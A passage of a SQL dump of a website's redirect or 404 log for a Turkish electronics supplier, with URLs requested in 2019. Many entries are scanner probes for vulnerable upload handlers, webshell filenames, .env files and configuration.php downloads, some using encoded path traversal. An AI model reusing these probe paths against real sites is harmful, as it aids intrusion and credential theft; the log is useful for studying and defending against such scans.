00:00:00',301),(22827,'http://3s-technologies.com.tr/en/wp-content/themes/headway-201/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-201/style.css','',1,0,'2019-05-31 14:33:35','0000-00-00 00:00:00',301),(22828,'http://3s-technologies.com.tr/tr/oijvjkodpcpsclkz.html',NULL,'','',1,0,'2019-05-31 22:35:49','0000-00-00 00:00:00',301),(22829,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-202/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-202/style.css','',2,0,'2019-06-01 01:37:06','0000-00-00 00:00:00',301),(22830,'http://3s-technologies.com.tr/en/wp-content/themes/headway-202/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-202/style.css','',1,0,'2019-06-01 01:40:16','0000-00-00 00:00:00',301),(22831,'http://3s-technologies.com.tr/en/wp-content/themes/famous/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/famous/style.css','',1,0,'2019-06-01 01:54:18','0000-00-00 00:00:00',301),(22832,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-207/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-207/style.css','',2,0,'2019-06-03 03:38:46','0000-00-00 00:00:00',301),(22833,'http://3s-technologies.com.tr/en/wp-content/themes/headway-207/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-207/style.css','',1,0,'2019-06-03 03:41:45','0000-00-00 00:00:00',301),(22834,'http://3s-technologies.com.tr/en/wp-content/themes/multimedia1/server/php',NULL,'http://3s-technologies.com.tr/wp-content/themes/multimedia1/server/php/','',1,0,'2019-06-03 04:23:07','0000-00-00 00:00:00',301),(22835,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler',NULL,'','',8,0,'2019-06-03 23:27:03','0000-00-00 00:00:00',301),(22836,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-208/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-208/style.css','',2,0,'2019-06-03 23:43:12','0000-00-00 00:00:00',301),(22837,'http://3s-technologies.com.tr/en/wp-content/themes/headway-208/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-208/style.css','',1,0,'2019-06-03 23:47:05','0000-00-00 00:00:00',301),(22838,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-209/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-209/style.css','',2,0,'2019-06-04 09:34:36','0000-00-00 00:00:00',301),(22839,'http://3s-technologies.com.tr/en/wp-content/themes/headway-209/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-209/style.css','',1,0,'2019-06-04 09:37:23','0000-00-00 00:00:00',301),(22840,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-2010/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-2010/style.css','',2,0,'2019-06-05 01:11:50','0000-00-00 00:00:00',301),(22841,'http://3s-technologies.com.tr/en/wp-content/themes/headway-2010/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-2010/style.css','',1,0,'2019-06-05 01:13:52','0000-00-00 00:00:00',301),(22842,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/smd-orta-hä±zlä±',NULL,'','',5,0,'2019-06-05 03:39:19','0000-00-00 00:00:00',301),(22843,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-2012/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-2012/style.css','',2,0,'2019-06-06 02:44:57','0000-00-00 00:00:00',301),(22844,'http://3s-technologies.com.tr/en/wp-content/themes/headway-2012/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-2012/style.css','',1,0,'2019-06-06 02:47:36','0000-00-00 00:00:00',301),(22845,'http://3s-technologies.com.tr/en/wp-content/themes/konzept/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/konzept/style.css','',1,0,'2019-06-06 03:19:19','0000-00-00 00:00:00',301),(22846,'http://3s-technologies.com.tr/en/nos/',NULL,'http://3s-technologies.com.tr/en/nos/','',5,0,'2019-06-06 19:56:40','0000-00-00 00:00:00',301),(22847,'http://www.3s-technologies.com.tr/tr/attjcqdfajtxdvz.html',NULL,'','',1,0,'2019-06-06 22:08:09','0000-00-00 00:00:00',301),(22848,'http://3s-technologies.com.tr/tr/rss/order/new',NULL,'http://3s-technologies.com.tr/rss/order/new/','',2,0,'2019-06-07 12:10:13','0000-00-00 00:00:00',301),(22849,'http://3s-technologies.com.tr/tr/nblnaskdujkf.html',NULL,'','',1,0,'2019-06-07 22:15:22','0000-00-00 00:00:00',301),(22850,'https://www.3s-technologies.com.tr/tr/ã¼rã¼nler/screen-printer',NULL,'','',6,0,'2019-06-08 09:19:20','0000-00-00 00:00:00',301),(22851,'http://3s-technologies.com.tr/tr/images/mish.txt',NULL,'','',2,0,'2019-06-08 10:28:46','0000-00-00 00:00:00',301),(22852,'https://mail.3s-technologies.com.tr/en/admin/images/cal_date_over.gif',NULL,'','',1,0,'2019-06-08 14:02:44','0000-00-00 00:00:00',301),(22853,'https://mail.3s-technologies.com.tr/en/admin/login.php',NULL,'','',1,0,'2019-06-08 14:03:00','0000-00-00 00:00:00',301),(22854,'https://mail.3s-technologies.com.tr/index.php?option=com_adsmanager&task=upload&tmpl=component',NULL,'','',2,0,'2019-06-08 14:04:09','0000-00-00 00:00:00',301),(22855,'https://mail.3s-technologies.com.tr/en/administrator/components/com_alberghi/upload.alberghi.php',NULL,'','',1,0,'2019-06-08 14:04:25','0000-00-00 00:00:00',301),(22856,'https://mail.3s-technologies.com.tr/en/?option=com_cckjseblod&task=download&file=configuration.php',NULL,'','',1,0,'2019-06-08 14:04:36','0000-00-00 00:00:00',301),(22857,'https://mail.3s-technologies.com.tr/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=',NULL,'','',1,0,'2019-06-08 14:04:51','0000-00-00 00:00:00',301),(22858,'https://mail.3s-technologies.com.tr/en/media/vuln.txt',NULL,'','',1,0,'2019-06-08 14:05:15','0000-00-00 00:00:00',301),(22859,'https://mail.3s-technologies.com.tr/index.php?option=com_jdownloads&itemid=0&view=upload',NULL,'','',2,0,'2019-06-08 14:05:35','0000-00-00 00:00:00',301),(22860,'https://mail.3s-technologies.com.tr/en/?option=com_joomanager&controller=details&task=download&path=configuration.php',NULL,'','',1,0,'2019-06-08 14:06:04','0000-00-00 00:00:00',301),(22861,'https://mail.3s-technologies.com.tr/index.php?option=com_myblog&task=ajaxupload',NULL,'','',1,0,'2019-06-08 14:06:11','0000-00-00 00:00:00',301),(22862,'https://mail.3s-technologies.com.tr/en/images/pwn.gif',NULL,'','',1,0,'2019-06-08 14:06:29','0000-00-00 00:00:00',301),(22863,'https://mail.3s-technologies.com.tr/en/plugins/content/s5_media_player/helper.php?fileurl=li4vli4vli4vy29uzmlndxjhdglvbi5waha=',NULL,'','',1,0,'2019-06-08 14:07:23','0000-00-00 00:00:00',301),(22864,'https://mail.3s-technologies.com.tr/en/components/com_jbcatalog/libraries/jsupload/server/php',NULL,'','',1,0,'2019-06-08 14:07:39','0000-00-00 00:00:00',301),(22865,'https://mail.3s-technologies.com.tr/en/components/com_sexycontactform/fileupload',NULL,'','',1,0,'2019-06-08 14:07:51','0000-00-00 00:00:00',301),(22866,'https://mail.3s-technologies.com.tr/en/administrator/components/com_rokdownloads/assets/uploadhandler.php',NULL,'','',1,0,'2019-06-08 14:08:02','0000-00-00 00:00:00',301),(22867,'https://mail.3s-technologies.com.tr/en/administrator/components/com_extplorer/uploadhandler.php',NULL,'','',1,0,'2019-06-08 14:08:16','0000-00-00 00:00:00',301),(22868,'https://mail.3s-technologies.com.tr/en/components/com_facileforms/libraries/jquery/uploadify.php',NULL,'','',1,0,'2019-06-08 14:08:40','0000-00-00 00:00:00',301),(22869,'https://mail.3s-technologies.com.tr/en/fckeditor/editor/filemanager/connectors/php/upload.php?type=media',NULL,'','',1,0,'2019-06-08 14:08:59','0000-00-00 00:00:00',301),(22870,'http://3s-technologies.com.tr/en/wp-content/themes/brainstorm/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/brainstorm/style.css','',1,0,'2019-06-09 03:39:12','0000-00-00 00:00:00',301),(22871,'http://3s-technologies.com.tr/en/wp-content/themes/headway-2013/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-2013/style.css','',1,0,'2019-06-09 04:08:18','0000-00-00 00:00:00',301),(22872,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-2013/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-2013/style.css','',2,0,'2019-06-09 04:13:09','0000-00-00 00:00:00',301),(22873,'http://3s-technologies.com.tr/tr/view.feed.php',NULL,'','',1,0,'2019-06-09 13:36:41','0000-00-00 00:00:00',301),(22874,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-2014/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-2014/style.css','',2,0,'2019-06-10 01:06:05','0000-00-00 00:00:00',301),(22875,'http://3s-technologies.com.tr/en/wp-content/themes/headway-2014/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-2014/style.css','',1,0,'2019-06-10 01:09:29','0000-00-00 00:00:00',301),(22876,'http://3s-technologies.com.tr/tr/administrator/xml.php',NULL,'','',2,0,'2019-06-10 21:37:25','0000-00-00 00:00:00',301),(22877,'http://www.3s-technologies.com.tr/en/?option=com_kunena&view=user&layout=edit',NULL,'','',6,0,'2019-06-11 07:50:18','0000-00-00 00:00:00',301),(22878,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-2015/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-2015/style.css','',1,0,'2019-06-11 08:09:16','0000-00-00 00:00:00',301),(22879,'http://3s-technologies.com.tr/en/wp-content/themes/headway-2015/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-2015/style.css','',1,0,'2019-06-11 08:12:33','0000-00-00 00:00:00',301),(22880,'http://3s-technologies.com.tr/en/wp-content/themes/qualifire/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/qualifire/style.css','',1,0,'2019-06-11 08:44:32','0000-00-00 00:00:00',301),(22881,'http://3s-technologies.com.tr/tr/downloads/ini.php',NULL,'','',1,0,'2019-06-11 15:33:08','0000-00-00 00:00:00',301),(22882,'http://3s-technologies.com.tr/tr/statistik/start.php',NULL,'','',1,0,'2019-06-11 15:33:09','0000-00-00 00:00:00',301),(22883,'http://3s-technologies.com.tr/tr/components/com_content/archive/engine_functions.php',NULL,'','',1,0,'2019-06-11 15:33:09','0000-00-00 00:00:00',301),(22884,'http://3s-technologies.com.tr/tr/templates/etads/features/engine_functions.php',NULL,'','',1,0,'2019-06-11 15:33:10','0000-00-00 00:00:00',301),(22885,'http://3s-technologies.com.tr/tr/templates/etads/fonts/engine_functions.php',NULL,'','',1,0,'2019-06-11 15:33:10','0000-00-00 00:00:00',301),(22886,'http://3s-technologies.com.tr/tr/menu/alias.php',NULL,'','',1,0,'2019-06-11 15:33:10','0000-00-00 00:00:00',301),(22887,'http://3s-technologies.com.tr/tr/modules/tiger/ws0.php',NULL,'','',1,0,'2019-06-11 15:33:11','0000-00-00 00:00:00',301),(22888,'http://3s-technologies.com.tr/tr/css/presets/engine_functions.php',NULL,'','',1,0,'2019-06-11 15:33:11','0000-00-00 00:00:00',301),(22889,'http://3s-technologies.com.tr/tr/room.php',NULL,'','',11,0,'2019-06-11 15:33:11','0000-00-00 00:00:00',301),(22890,'http://3s-technologies.com.tr/tr/upload/.082250.php',NULL,'','',1,0,'2019-06-11 15:33:12','0000-00-00 00:00:00',301),(22891,'http://3s-technologies.com.tr/tr/templates/etads/layout/engine_functions.php',NULL,'','',1,0,'2019-06-11 15:33:12','0000-00-00 00:00:00',301),(22892,'http://3s-technologies.com.tr/tr/menu/.4e7f3d.php',NULL,'','',1,0,'2019-06-11 15:33:12','0000-00-00 00:00:00',301),(22893,'http://3s-technologies.com.tr/tr/templates/etads/images/presets/preset1/engine_functions.php',NULL,'','',1,0,'2019-06-11 15:33:12','0000-00-00 00:00:00',301),(22894,'http://3s-technologies.com.tr/tr/upload/dump.php',NULL,'','',1,0,'2019-06-11 15:33:13','0000-00-00 00:00:00',301),(22895,'http://3s-technologies.com.tr/tr/statistik/.cca27f.php',NULL,'','',1,0,'2019-06-11 15:33:13','0000-00-00 00:00:00',301),(22896,'http://3s-technologies.com.tr/tr/js/engine_functions.php',NULL,'','',1,0,'2019-06-11 15:33:13','0000-00-00 00:00:00',301),(22897,'http://3s-technologies.com.tr/tr/administrator/components/com_menus/models/page.php',NULL,'','',1,0,'2019-06-11 15:33:14','0000-00-00 00:00:00',301),(22898,'http://3s-technologies.com.tr/tr/modules/mod_ariimageslidersa/ws.php',NULL,'','',1,0,'2019-06-11 15:33:14','0000-00-00 00:00:00',301),(22899,'http://3s-technologies.com.tr/tr/libraries/joomla/document/html/renderer/post_controller.php',NULL,'','',1,0,'2019-06-11 15:33:14','0000-00-00 00:00:00',301),(22900,'http://3s-technologies.com.tr/tr/modules/mod_ariimagesliderer/footer_menu.php',NULL,'','',1,0,'2019-06-11 15:33:14','0000-00-00 00:00:00',301),(22901,'http://3s-technologies.com.tr/tr/wp-inc.php',NULL,'','',4,0,'2019-06-11 15:33:15','0000-00-00 00:00:00',301),(22902,'http://3s-technologies.com.tr/tr/templates/beez_20/global.php',NULL,'','',1,0,'2019-06-11 15:33:16','0000-00-00 00:00:00',301),(22903,'http://3s-technologies.com.tr/tr/links.php',NULL,'','',3,0,'2019-06-11 15:33:16','0000-00-00 00:00:00',301),(22904,'http://3s-technologies.com.tr/tr/media/checkpack.php',NULL,'','',1,0,'2019-06-11 15:33:17','0000-00-00 00:00:00',301),(22905,'http://3s-technologies.com.tr/tr/components/com_banners/helpers/css.php',NULL,'','',1,0,'2019-06-11 15:33:17','0000-00-00 00:00:00',301),(22906,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/helpers.php',NULL,'','',2,0,'2019-06-11 15:33:17','0000-00-00 00:00:00',301),(22907,'http://3s-technologies.com.tr/tr/administrator/components/com_zoo/models/caches.php',NULL,'','',1,0,'2019-06-11 15:33:18','0000-00-00 00:00:00',301),(22908,'http://3s-technologies.com.tr/tr/administrator/backups/content_v_2.0.9.php',NULL,'','',1,0,'2019-06-11 15:33:18','0000-00-00 00:00:00',301),(22909,'http://3s-technologies.com.tr/tr/administrator/components/com_installer/views/languages/tmpl/config.php',NULL,'','',1,0,'2019-06-11 15:33:18','0000-00-00 00:00:00',301),(22910,'http://3s-technologies.com.tr/tr/administrator/components/com_templates/tables/modx.php',NULL,'','',2,0,'2019-06-11 15:33:19','0000-00-00 00:00:00',301),(22911,'http://3s-technologies.com.tr/tr/cache/cws.php',NULL,'','',1,0,'2019-06-11 15:33:19','0000-00-00 00:00:00',301),(22912,'http://3s-technologies.com.tr/tr/administrator/language/en-gb/content_v_2.0.9.php',NULL,'','',1,0,'2019-06-11 15:33:20','0000-00-00 00:00:00',301),(22913,'http://3s-technologies.com.tr/tr/administrator/components/com_gantry5/scss/admin/particles/config.php',NULL,'','',1,0,'2019-06-11 15:33:20','0000-00-00 00:00:00',301),(22914,'http://3s-technologies.com.tr/tr/plugins/content/apismtp/sup_wp.php',NULL,'','',1,0,'2019-06-11 15:33:21','0000-00-00 00:00:00',301),(22915,'http://3s-technologies.com.tr/tr/media/eswc.php',NULL,'','',1,0,'2019-06-11 15:33:21','0000-00-00 00:00:00',301),(22916,'http://3s-technologies.com.tr/tr/administrator/components/com_admin/updates.php',NULL,'','',1,0,'2019-06-11 15:33:21','0000-00-00 00:00:00',301),(22917,'http://3s-technologies.com.tr/tr/templates/beez3/html/com_newsfeeds/categories/config.php',NULL,'','',1,0,'2019-06-11 15:33:21','0000-00-00 00:00:00',301),(22918,'http://3s-technologies.com.tr/tr/components/com_contact/com_contact.php',NULL,'','',1,0,'2019-06-11 15:33:22','0000-00-00 00:00:00',301),(22919,'http://3s-technologies.com.tr/tr/modules/mod_araticlws/mod_araticlws.php',NULL,'','',13,0,'2019-06-11 15:33:22','0000-00-00 00:00:00',301),(22920,'http://3s-technologies.com.tr/tr/libraries/fof/form/field/wp-lang.php',NULL,'','',1,0,'2019-06-11 15:33:22','0000-00-00 00:00:00',301),(22921,'http://3s-technologies.com.tr/tr/libraries/fof/form/field/wp_angle.php',NULL,'','',1,0,'2019-06-11 15:33:22','0000-00-00 00:00:00',301),(22922,'http://3s-technologies.com.tr/tr/components/com_banners/moderator.php',NULL,'','',1,0,'2019-06-11 15:33:23','0000-00-00 00:00:00',301),(22923,'http://3s-technologies.com.tr/tr/xupx/db.php',NULL,'','',1,0,'2019-06-11 15:33:24','0000-00-00 00:00:00',301),(22924,'http://3s-technologies.com.tr/tr/libraries/joomla/github/package/pulls/config.php',NULL,'','',1,0,'2019-06-11 15:33:24','0000-00-00 00:00:00',301),(22925,'http://3s-technologies.com.tr/tr/111.php',NULL,'','',42,0,'2019-06-11 15:33:25','0000-00-00 00:00:00',301),(22926,'http://3s-technologies.com.tr/tr/js/flash/_cache.php',NULL,'','',1,0,'2019-06-11 15:33:25','0000-00-00 00:00:00',301),(22927,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway/style.css','',2,0,'2019-06-12 00:49:12','0000-00-00 00:00:00',301),(22928,'http://3s-technologies.com.tr/en/wp-content/themes/headway/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway/style.css','',1,0,'2019-06-12 00:52:08','0000-00-00 00:00:00',301),(22929,'http://3s-technologies.com.tr/en/wp-content/themes/u-design/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/u-design/style.css','',1,0,'2019-06-12 08:42:43','0000-00-00 00:00:00',301),(22930,'http://3s-technologies.com.tr/en/wp-content/themes/headway-16/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-16/style.css','',1,0,'2019-06-13 01:44:39','0000-00-00 00:00:00',301),(22931,'http://3s-technologies.com.tr/tr/ads.txt',NULL,'','',2311,0,'2019-06-13 07:36:49','0000-00-00 00:00:00',301),(22932,'http://3s-technologies.com.tr/en/wp-content/themes/nuance/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/nuance/style.css','',1,0,'2019-06-13 09:28:31','0000-00-00 00:00:00',301),(22933,'https://3s-technologies.com.tr/tr/shop/index.php/admin',NULL,'','',1,0,'2019-06-14 06:07:28','0000-00-00 00:00:00',301),(22934,'https://3s-technologies.com.tr/tr/shop/downloader/index.php',NULL,'','',1,0,'2019-06-14 06:07:30','0000-00-00 00:00:00',301),(22935,'https://3s-technologies.com.tr/tr/shop/errors/503.php',NULL,'','',1,0,'2019-06-14 06:07:37','0000-00-00 00:00:00',301),(22936,'https://3s-technologies.com.tr/tr/store/index.php/admin',NULL,'','',1,0,'2019-06-14 06:07:38','0000-00-00 00:00:00',301),(22937,'https://3s-technologies.com.tr/tr/store/downloader/index.php',NULL,'','',1,0,'2019-06-14 06:07:40','0000-00-00 00:00:00',301),(22938,'https://3s-technologies.com.tr/tr/store/errors/503.php',NULL,'','',1,0,'2019-06-14 06:07:41','0000-00-00 00:00:00',301),(22939,'https://3s-technologies.com.tr/tr/magento/index.php/admin',NULL,'','',1,0,'2019-06-14 06:07:49','0000-00-00 00:00:00',301),(22940,'https://3s-technologies.com.tr/tr/magento/downloader/index.php',NULL,'','',1,0,'2019-06-14 06:07:53','0000-00-00 00:00:00',301),(22941,'https://3s-technologies.com.tr/tr/magento/errors/503.php',NULL,'','',1,0,'2019-06-14 06:07:54','0000-00-00 00:00:00',301),(22942,'https://3s-technologies.com.tr/tr/admin',NULL,'','',42,0,'2019-06-14 06:07:56','0000-00-00 00:00:00',301),(22943,'https://3s-technologies.com.tr/tr/downloader/index.php',NULL,'','',1,0,'2019-06-14 06:07:58','0000-00-00 00:00:00',301),(22944,'https://3s-technologies.com.tr/tr/errors/503.php',NULL,'','',1,0,'2019-06-14 06:08:00','0000-00-00 00:00:00',301),(22945,'http://3s-technologies.com.tr/en/wp-content/themes/thisway/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/themes/ThisWay/readme.txt','',1,0,'2019-06-14 09:48:49','0000-00-00 00:00:00',301),(22946,'http://3s-technologies.com.tr/en/wp-content/themes/headway-161/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-161/style.css','',2,0,'2019-06-14 15:18:23','0000-00-00 00:00:00',301),(22947,'http://www.3s-technologies.com.tr/en/wp-content/themes/thisway/readme.txt',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/ThisWay/readme.txt','',2,0,'2019-06-14 15:59:32','0000-00-00 00:00:00',301),(22948,'http://3s-technologies.com.tr/en/wp-content/themes/headway-163/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-163/style.css','',1,0,'2019-06-15 01:41:59','0000-00-00 00:00:00',301),(22949,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css','',1,0,'2019-06-15 11:41:57','0000-00-00 00:00:00',301),(22950,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/temizleme-makineleri/by,mf_name/dirdesc/results,1-20?language=tr-tr',NULL,'','',1,0,'2019-06-15 14:32:13','0000-00-00 00:00:00',301),(22951,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css',NULL,'http://www.3s-technologies.com.tr/wp-content/plugins/wp-crm/third-party/uploadify/uploadify.css','',2,0,'2019-06-15 16:10:50','0000-00-00 00:00:00',301),(22952,'http://www.3s-technologies.com.tr/tr/cdoqtdeqtlvsitw.html',NULL,'','',1,0,'2019-06-15 16:53:02','0000-00-00 00:00:00',301),(22953,'http://3s-technologies.com.tr/tr/libraries/fof/form/field/conf.php',NULL,'','',1,0,'2019-06-15 20:19:21','0000-00-00 00:00:00',301),(22954,'http://www.3s-technologies.com.tr/en/.env',NULL,'','',7,0,'2019-06-15 21:39:04','0000-00-00 00:00:00',301),(22955,'http://3s-technologies.com.tr/en/wp-content/themes/headway-165/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-165/style.css','',1,0,'2019-06-15 22:35:07','0000-00-00 00:00:00',301),(22956,'http://3s-technologies.com.tr/en/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=zwnobyaidmrhzhnmz2rmijs=',NULL,'http://3s-technologies.com.tr/components/com_jnews/includes/openflashchart/tmp-upload-images/255test.php?com=123&content=ZWNobyAidmRhZHNmZ2RmIjs=','',2,0,'2019-06-16 04:52:33','0000-00-00 00:00:00',301),(22957,'http://3s-technologies.com.tr/tr/temqdbkcj.html',NULL,'','',1,0,'2019-06-16 22:51:14','0000-00-00 00:00:00',301),(22958,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-120/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-120/style.css','',2,0,'2019-06-17 02:38:35','0000-00-00 00:00:00',301),(22959,'http://3s-technologies.com.tr/en/wp-content/themes/headway-120/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-120/style.css','',1,0,'2019-06-17 02:41:36','0000-00-00 00:00:00',301),(22960,'http://3s-technologies.com.tr/en/wp-content/plugins/estatik/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/estatik/readme.txt','',1,0,'2019-06-17 02:52:11','0000-00-00 00:00:00',301),(22961,'http://www.3s-technologies.com.tr/en/wp-content/themes/headway-airsolution/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/headway-airsolution/style.css','',2,0,'2019-06-17 13:57:29','0000-00-00 00:00:00',301),(22962,'http://3s-technologies.com.tr/en/wp-content/themes/headway-airsolution/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/headway-airsolution/style.css','',1,0,'2019-06-17 14:00:25','0000-00-00 00:00:00',301),(22963,'http://3s-technologies.com.tr/tr/configurator.php',NULL,'','',1,0,'2019-06-17 17:22:36','0000-00-00 00:00:00',301),(22964,'http://3s-technologies.com.tr/tr/media/editors/tinymce/skins/lightgray/img/strange.php',NULL,'','',1,0,'2019-06-17 17:41:24','0000-00-00 00:00:00',301),(22965,'http://3s-technologies.com.tr/tr/logs/logger.php',NULL,'','',1,0,'2019-06-17 17:47:57','0000-00-00 00:00:00',301),(22966,'http://3s-technologies.com.tr/en/wp-content/plugins/revslider/temp/update_extract/revslider/db.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/revslider/temp/update_extract/revslider/db.php','',2,0,'2019-06-17 23:41:23','0000-00-00 00:00:00',301),(22967,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-symposium/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/wp-symposium/readme.txt','',1,0,'2019-06-18 02:58:43','0000-00-00 00:00:00',301),(22968,'http://3s-technologies.com.tr/license.manager.php',NULL,'','',1,0,'2019-06-18 11:02:21','0000-00-00 00:00:00',301),(22969,'http://www.3s-technologies.com.tr/en/wp-content/themes/synoptic/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/synoptic/style.css','',2,0,'2019-06-18 15:27:36','0000-00-00 00:00:00',301),(22970,'http://3s-technologies.com.tr/en/wp-content/themes/synoptic/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/synoptic/style.css','',1,0,'2019-06-18 15:31:26','0000-00-00 00:00:00',301),(22971,'http://3s-technologies.com.tr/tr/media/editors/tinymce/skins/lightgray/img/test.php',NULL,'','',1,0,'2019-06-18 16:03:02','0000-00-00 00:00:00',301),(22972,'http://3s-technologies.com.tr/tr/templates/beez_20/fonts/page.php',NULL,'','',1,0,'2019-06-18 16:25:34','0000-00-00 00:00:00',301),(22973,'http://3s-technologies.com.tr/tr/libraries/mosets/profilepicture/loc.php',NULL,'','',1,0,'2019-06-18 16:49:56','0000-00-00 00:00:00',301),(22974,'http://3s-technologies.com.tr/administrator/components/com_login/views/login/tmpl/alundum.php',NULL,'','',1,0,'2019-06-18 20:06:53','0000-00-00 00:00:00',301),(22975,'http://www.3s-technologies.com.tr/en/wp-content/themes/geoplaces3/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/GeoPlaces3/style.css','',3,0,'2019-06-19 01:46:19','0000-00-00 00:00:00',301),(22976,'http://3s-technologies.com.tr/en/wp-content/themes/geoplaces3/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/GeoPlaces3/style.css','',2,0,'2019-06-19 01:49:16','0000-00-00 00:00:00',301),(22977,'http://3s-technologies.com.tr/en/wp-content/themes/project10-theme/style.css',NULL,'http://3s-technologies.com.tr/wp-content/themes/project10-theme/style.css','',1,0,'2019-06-19 02:00:41','0000-00-00 00:00:00',301),(22978,'http://www.3s-technologies.com.tr/en/wp-content/themes/project10-theme/style.css',NULL,'http://www.3s-technologies.com.tr/wp-content/themes/project10-theme/style.css','',2,0,'2019-06-19 07:48:43','0000-00-00 00:00:00',301),(22979,'http://www.3s-technologies.com.tr/en/admin.php',NULL,'','',5,0,'2019-06-20 08:35:56','0000-00-00 00:00:00',301),(22980,'http://3s-technologies.com.tr/tr/userloader.php',NULL,'','',1,0,'2019-06-20 13:01:30','0000-00-00 00:00:00',301),(22981,'http://3s-technologies.com.tr/tr/vendor/phpunit/phpunit/src/util/php/kill.php',NULL,'','',8,0,'2019-06-23 05:02:49','0000-00-00 00:00:00',301),(22982,'http://www.3s-technologies.com.tr/tr/ayrlnryfuywvj.html',NULL,'','',1,0,'2019-06-23 16:23:24','0000-00-00 00:00:00',301),(22983,'http://3s-technologies.com.tr/tr/zxlwdzifescqn.html',NULL,'','',1,0,'2019-06-24 16:13:40','0000-00-00 00:00:00',301),(22984,'http://3s-technologies.com.tr/en/wp-content/plugins/font-uploader/readme.txt',NULL,'http://3s-technologies.com.tr/wp-content/plugins/font-uploader/readme.txt','',1,0,'2019-06-26 00:37:10','0000-00-00 00:00:00',301),(22985,'http://3s-technologies.com.tr/tr/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/tr/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php','',10,0,'2019-06-26 06:49:52','0000-00-00 00:00:00',301),(22986,'http://3s-technologies.com.tr/en/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php',NULL,'http://3s-technologies.com.tr/joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php','',2,0,'2019-06-26 09:17:32','0000-00-00 00:00:00',301),(22987,'http://proneo-led.com/3s-technologies.com.tr/joomla/index.php/tr/ueruenler/bölgesel-lehimleme/ess-310-detail',NULL,'','',2,0,'2019-06-26 20:02:00','0000-00-00 00:00:00',301),(22988,'http://3s-technologies.com.tr/en/wp-content/plugins/revslider/temp/update_extract/conf.php',NULL,'http://3s-technologies.com.tr/wp-content/plugins/revslider/temp/update_extract/conf.php','',1,0,'2019-06-26 23:51:25','0000-00-00 00:00:00',301),(22989,'http://3s-technologies.com.tr/tr/shalink.php',NULL,'','',1,0,'2019-06-29 13:32:14','0000-00-00 00:00:00',301),(22990,'http://3s-technologies.com.tr/tr/none.html',NULL,'','',1,0,'2019-06-29 13:32:15','0000-00-00 00:00:00',301),(22991,'http://www.3s-technologies.com.tr/index.php/tr/ueruenler/lehimleme-malzemeleri/krem-lehim/by,category_name/results,1-20',NULL,'','',5,0,'2019-06-30 02:00:13','0000-00-00 